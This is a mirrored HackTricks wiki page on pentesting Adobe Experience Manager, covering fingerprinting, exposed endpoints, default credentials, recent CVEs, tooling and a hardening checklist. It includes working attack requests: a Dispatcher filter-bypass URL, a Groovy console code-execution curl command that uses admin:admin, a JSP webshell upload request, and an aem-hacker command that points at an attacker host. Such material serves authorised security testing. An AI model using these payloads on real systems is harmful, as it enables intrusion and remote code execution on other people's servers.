maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md

5.5 KiB
Raw Blame History

AEM (Adobe Experience Manager) Pentesting

{{#include ../../banners/hacktricks-training.md}}

Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).
From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.

The checklist below focuses on externally reachable (unauth) attack surface that keeps showing up in real engagements (2022-2025).

1. Fingerprinting

$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1            # header added by AEM Dispatcher
X-Vary: Accept-Encoding

Other quick indicators:

  • /etc.clientlibs/ static path present (returns JS/CSS).
  • /libs/granite/core/content/login.html login page with the “Adobe Experience Manager” banner.
  • </script><!--/* CQ */--> comment at the bottom of HTML.

2. High-value unauthenticated endpoints

Path What you get Notes
/.json, /.1.json JCR nodes via DefaultGetServlet Often blocked, but Dispatcher bypass (see below) works.
/bin/querybuilder.json?path=/ QueryBuilder API Leak of page tree, internal paths, user names.
/system/console/status-*, /system/console/bundles OSGi/Felix console 403 by default; if exposed & creds found ⇒ bundle-upload RCE.
/crx/packmgr/index.jsp Package Manager Allows authenticated content packages → JSP payload upload.
/etc/groovyconsole/** AEM Groovy Console If exposed → arbitrary Groovy / Java execution.
/libs/cq/AuditlogSearchServlet.json Audit logs Information disclosure.
/libs/cq/ui/content/dumplibs.html ClientLibs dump XSS vector.

Dispatcher bypass trick

Most production sites sit behind the Dispatcher (reverse-proxy). Its filter rules can be bypassed by appending an allowed static extension after a semicolon or encoded newline:

GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1

A single request like above frequently discloses user profile nodes with email addresses. P-T Partners published good guidance on this weakness. 【】

3. Common misconfigurations (still alive in 2025)

  1. Anonymous POST servlet POST /.json with :operation=import lets you plant new JCR nodes. Blocking *.json POST in the Dispatcher fixes it. 【】
  2. World-readable user profiles default ACL grants jcr:read on /home/users/**/profile/* to everyone.
  3. Default credentials admin:admin, author:author, replication:replication.
  4. WCMDebugFilter enabled ⇒ reflected XSS via ?debug=layout (CVE-2016-7882, still found on legacy 6.4 installs).
  5. Groovy Console exposed remote code execution by sending a Groovy script: 
    curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json

4. Recent vulnerabilities (service-pack cadence)

Quarter CVE Affected Impact
Dec 2024 CVE-2024-43711 6.5.21 and earlier Improper input validation → Arbitrary code execution (requires low-priv auth). 【】
Dec 2024 CVE-2024-43724/26 6.5.21 and earlier DOM / Stored XSS in Move Page Wizard. 【】
Dec 2023 CVE-2023-48452/68 ≤ 6.5.18 DOM-based XSS via crafted URL. 【】
Dec 2022 CVE-2022-30683 ≤ 6.5.13 Crypto design flaw → secret decryption (needs low-priv creds). 【】

Always check the APSB bulletin matching the customers service-pack and request the latest 6.5.22 or Cloud Service 2024.11.

5. Exploitation snippets

5.1 RCE via dispatcher bypass + JSP upload

If anonymous write is possible:

# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import

Now request /content/evil.jsp the JSP runs with the AEM process user.

5.2 SSRF to RCE (historical < 6.3)

/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py from aem-hacker automates the full chain. 【】

6. Tooling

  • aem-hacker Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more. 
    python3 aem_hacker.py -u https://target --host attacker-ip
```【】
  • Content Brute-force recursively request /_jcr_content.(json|html) to discover hidden components.
  • osgi-infect upload malicious OSGi bundle via /system/console/bundles if creds available.

7. Hardening checklist (for your reports recommendations)

  1. Keep instance on the latest cumulative service pack (as of Jul 2025: 6.5.22).
  2. Remove/rotate default accounts; enforce SSO/SAML.
  3. Tighten Dispatcher filters deny ;, encoded newlines, and *.json or *.querybuilder.json for anonymous users.
  4. Disable or protect consoles (/system/console, /crx/*, /etc/groovyconsole) with IP allow-lists.
  5. Apply the Anonymous Permission Hardening package shipped by Adobe.

References

  • Adobe Security Bulletin APSB24-69 “Security updates for Adobe Experience Manager (Dec 2024)”.
  • 0ang3el aem-hacker tool (GitHub). {{#include ../../banners/hacktricks-training.md}}